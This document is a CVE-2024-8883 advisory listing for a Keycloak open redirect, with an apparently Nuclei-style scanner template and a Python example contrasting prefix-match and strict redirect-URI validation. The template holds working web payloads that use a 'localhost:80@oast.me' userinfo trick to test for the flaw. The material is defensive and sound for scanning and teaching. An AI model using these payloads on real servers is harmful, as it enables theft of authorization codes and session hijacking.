| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-8883 | 19 Sep 2024 16:15 | – | attackerkb |
| CVE-2024-8883 vulnerabilities | 19 Sep 2024 16:15 | – | cgr |
| CVE-2024-8883 | 19 Sep 2024 18:40 | – | circl |
| Red Hat Keycloak input validation error vulnerability | 19 Sep 2024 00:00 | – | cnnvd |
| CVE-2024-8883 | 19 Sep 2024 15:48 | – | cve |
| CVE-2024-8883 Keycloak: vulnerable redirect uri validation results in open redirec | 19 Sep 2024 15:48 | – | cvelist |
| EUVD-2024-3152 | 3 Oct 2025 20:07 | – | euvd |
| Duplicate Advisory: Keycloak Open Redirect vulnerability | 19 Sep 2024 18:30 | – | github |
| Keycloak has Vulnerable Redirect URI Validation Results in Open Redirect | 14 Oct 2024 20:55 | – | github |
| CVE-2024-8883 | 19 Sep 2024 16:15 | – | nvd |
```yaml
id: CVE-2024-8883

info:
  name: Keycloak - Open Redirect
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.
  impact: |
    Attackers can redirect users to malicious URLs and capture sensitive information such as authorization codes and session tokens, potentially leading to session hijacking and account compromise.
  remediation: |
    Update Keycloak configuration to avoid using localhost or 127.0.0.1 as Valid Redirect URIs, and apply security patches addressing the open redirect vulnerability.
  reference:
    - https://github.com/advisories/GHSA-vvf8-2h68-9475
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8883
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
    cvss-score: 6.8
    cve-id: CVE-2024-8883
    cwe-id: CWE-601
    epss-score: 0.01959
    epss-percentile: 0.77893
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"keycloak"
  tags: cve,cve2024,keycloak,redirect,vuln,vkev

variables:
  redirect_uri: "oast.me"

http:
  - raw:
      - |
        GET /realms/master/protocol/openid-connect/auth?client_id={{client_id}}&redirect_uri={{redir_host}}:80@{{redirect_uri}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      redir_host:
        - http://localhost
        - http://127.0.0.1
        - https://localhost
        - https://127.0.0.1
        - http://[::]
        - https://[::]
      client_id:
        - security-admin-console
        - master-realm
        - broker
        - admin-cli
        - account
        - account-console
    attack: clusterbomb
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - 'Location:\s+https?://(localhost|127.0.0.1|\[::\]):\d*@oast\.me\?'

      - type: status
        status:
          - 302
# digest: 4a0a00473045022000c8a4de21e3c3f5d68884e517dff9ed3689849896973dd4de8d05e96c078d4802210097eb6e0df7b48a01c1df216f5d1c8b59d6c0099241c05f5a3dde0f6903bbd733:922c64590222798bb761d5b6d8e72950
```
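The weakness the template probes is a redirect-URI check that treats `http://localhost:80@oast.me` as matching the registered `http://localhost`, because the URL's userinfo part (`localhost:80@`) makes the string look like the allowed origin while the real host is `oast.me`. The following is an added defender-side illustration, not Keycloak's own validation code: it contrasts a prefix-match check, which the payload shape passes, with a check that parses the URL, rejects any userinfo, and compares scheme and host against the allow-list. The allow-list and sample redirect are constructed for the example.

```python
from urllib.parse import urlsplit

# Registered "Valid Redirect URIs" of the kind the advisory warns about
# (constructed sample configuration, not taken from any real realm).
VALID_REDIRECT_URIS = ["http://localhost", "http://127.0.0.1"]

# The payload shape the template sends: an allowed host followed by ":80@",
# so the authority's real host is a different one (constructed sample).
SAMPLE_REDIRECT = "http://localhost:80@oast.me/callback"


def naive_prefix_check(redirect_uri: str) -> bool:
    """String-prefix matching: accepts anything that merely *starts* with an
    allowed URI. This is the kind of check a CWE-601 open redirect abuses."""
    return any(redirect_uri.startswith(allowed) for allowed in VALID_REDIRECT_URIS)


def strict_origin_check(redirect_uri: str) -> bool:
    """Parse the URL and compare scheme + host with the parsed allow-list.
    Userinfo ("user:pass@") is rejected outright, so "localhost:80@oast.me"
    is seen for what it is: a redirect to oast.me."""
    try:
        parts = urlsplit(redirect_uri)
    except ValueError:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    for allowed in VALID_REDIRECT_URIS:
        a = urlsplit(allowed)
        if parts.scheme == a.scheme and parts.hostname == a.hostname:
            return True
    return False


if __name__ == "__main__":
    print("naive  :", naive_prefix_check(SAMPLE_REDIRECT))   # True  (bypassed)
    print("strict :", strict_origin_check(SAMPLE_REDIRECT))  # False (blocked)
```

Even with the strict check, the remediation above still applies: registering `localhost` or `127.0.0.1` as a valid redirect URI in a production realm remains a misconfiguration.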